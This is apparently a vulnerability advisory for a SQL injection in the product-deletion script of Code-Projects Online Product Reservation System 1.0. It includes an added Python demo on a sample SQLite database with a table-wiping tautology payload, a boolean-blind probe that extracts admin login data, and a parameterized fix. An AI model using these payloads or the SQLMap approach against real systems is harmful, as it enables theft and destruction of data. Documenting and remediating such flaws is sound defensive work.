Code-Projects Online Product Reservation System SQL Injection Vulnerability in Delete Functionality

Vulnerability

A critical SQL injection vulnerability has been identified in Code-Projects Online Product Reservation System version 1.0. The issue resides in the product deletion feature implemented in '/handgunner-administrator/delete.php'. The 'id' parameter supplied by the user is concatenated directly into a DELETE SQL statement without input validation or, as reported, an authentication check. An attacker who controls the 'id' value can therefore alter the WHERE clause of the DELETE statement and, through that statement, read or destroy database records. The vulnerability is exploitable remotely, and a public exploit is available.

Impact

Exploitation of this vulnerability allows an attacker to interfere with the queries the application sends to its database, leading to unauthorized data access, manipulation, or deletion. Because the injection point is a DELETE statement, a tautology in the injected condition (for example, one that is true for every row) removes every product record, while a conditional expression in the same position turns the statement into a yes/no oracle from which table contents can be inferred. In the reported case the vulnerability was used to extract data from the 'admin_login' table of the 'cj_handgunner' database.

Reproduction

The vulnerability can be reproduced by sending a POST request to 'handgunner-administrator/delete.php' with an 'id' parameter that carries a SQL payload in place of a numeric product identifier. Because the value is not validated, extraction can be automated with a tool such as SQLMap pointed at the 'id' parameter of that POST request.
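The following is an added, self-contained illustration of the injection pattern described above and is not code from Code-Projects Online Product Reservation System. It reconstructs in Python with an in-memory SQLite database what the advisory attributes to delete.php: a DELETE statement built by string concatenation from the 'id' parameter. The table names 'products' and 'admin_login', the sample rows, and the function names are assumptions made for the example (the page names only 'admin_login' and 'cj_handgunner'). It shows a tautology payload wiping the table, a boolean condition in the same position leaking the first character of an admin username through the "was the row deleted" oracle that SQLMap automates, and the parameterized, validated form that closes the hole.

```python
import sqlite3

# Constructed sample data for the example; not from the affected application.
SAMPLE_SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO products VALUES (1, 'chair'), (2, 'table'), (3, 'lamp');
CREATE TABLE admin_login (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO admin_login VALUES (1, 'admin', 'not-a-real-hash');
"""


def make_db() -> sqlite3.Connection:
    """Fresh in-memory database populated with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def delete_product_vulnerable(conn: sqlite3.Connection, product_id: str) -> int:
    """Hypothetical reconstruction of the flawed pattern: the request parameter
    is pasted straight into the DELETE statement. Returns rows deleted."""
    sql = f"DELETE FROM products WHERE id = '{product_id}'"
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def delete_product_fixed(conn: sqlite3.Connection, product_id: str) -> int:
    """Hardened form: reject anything that is not a positive integer, then bind
    the value as a parameter so it can never change the statement's structure."""
    if not product_id.isdigit():
        raise ValueError("id must be a positive integer")
    cur = conn.execute("DELETE FROM products WHERE id = ?", (int(product_id),))
    conn.commit()
    return cur.rowcount


def remaining_products(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT COUNT(*) FROM products").fetchone()[0]


def blind_first_char(guess: str) -> bool:
    """Boolean-based blind probe against the vulnerable function. The payload
    makes the WHERE clause
        id = '0' OR (SELECT substr(username,1,1) FROM admin_login) = '<guess>'
    so every product row is deleted exactly when the guess is right. The
    attacker's oracle is whether rows disappeared; repeating this per position
    and per candidate character reads out admin_login one character at a time."""
    conn = make_db()
    payload = "0' OR (SELECT substr(username,1,1) FROM admin_login)='" + guess
    delete_product_vulnerable(conn, payload)
    return remaining_products(conn) == 0


if __name__ == "__main__":
    db = make_db()
    print("tautology deleted", delete_product_vulnerable(db, "1' OR '1'='1"), "rows")
    print("first char of admin username is 'a':", blind_first_char("a"))
    print("first char of admin username is 'z':", blind_first_char("z"))
```

The probe uses a destructive oracle, which is what a DELETE-based injection point offers when error messages are suppressed; in a live engagement the same condition would typically be attached to a non-existent id or converted to a time-based test so that data is not destroyed during extraction. The fixed variant shows the two controls that together remove the issue: reject non-numeric input before it reaches the database, and pass the value as a bound parameter rather than concatenating it.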

Added: Jan 4, 2026, 12:17 PM
Updated: Jan 4, 2026, 12:17 PM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 5.0
exploitability: 8.7
remediation: 0.0
relevance: 1.9
threat: 6.4
urgency: 2.9
incentive: 5.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.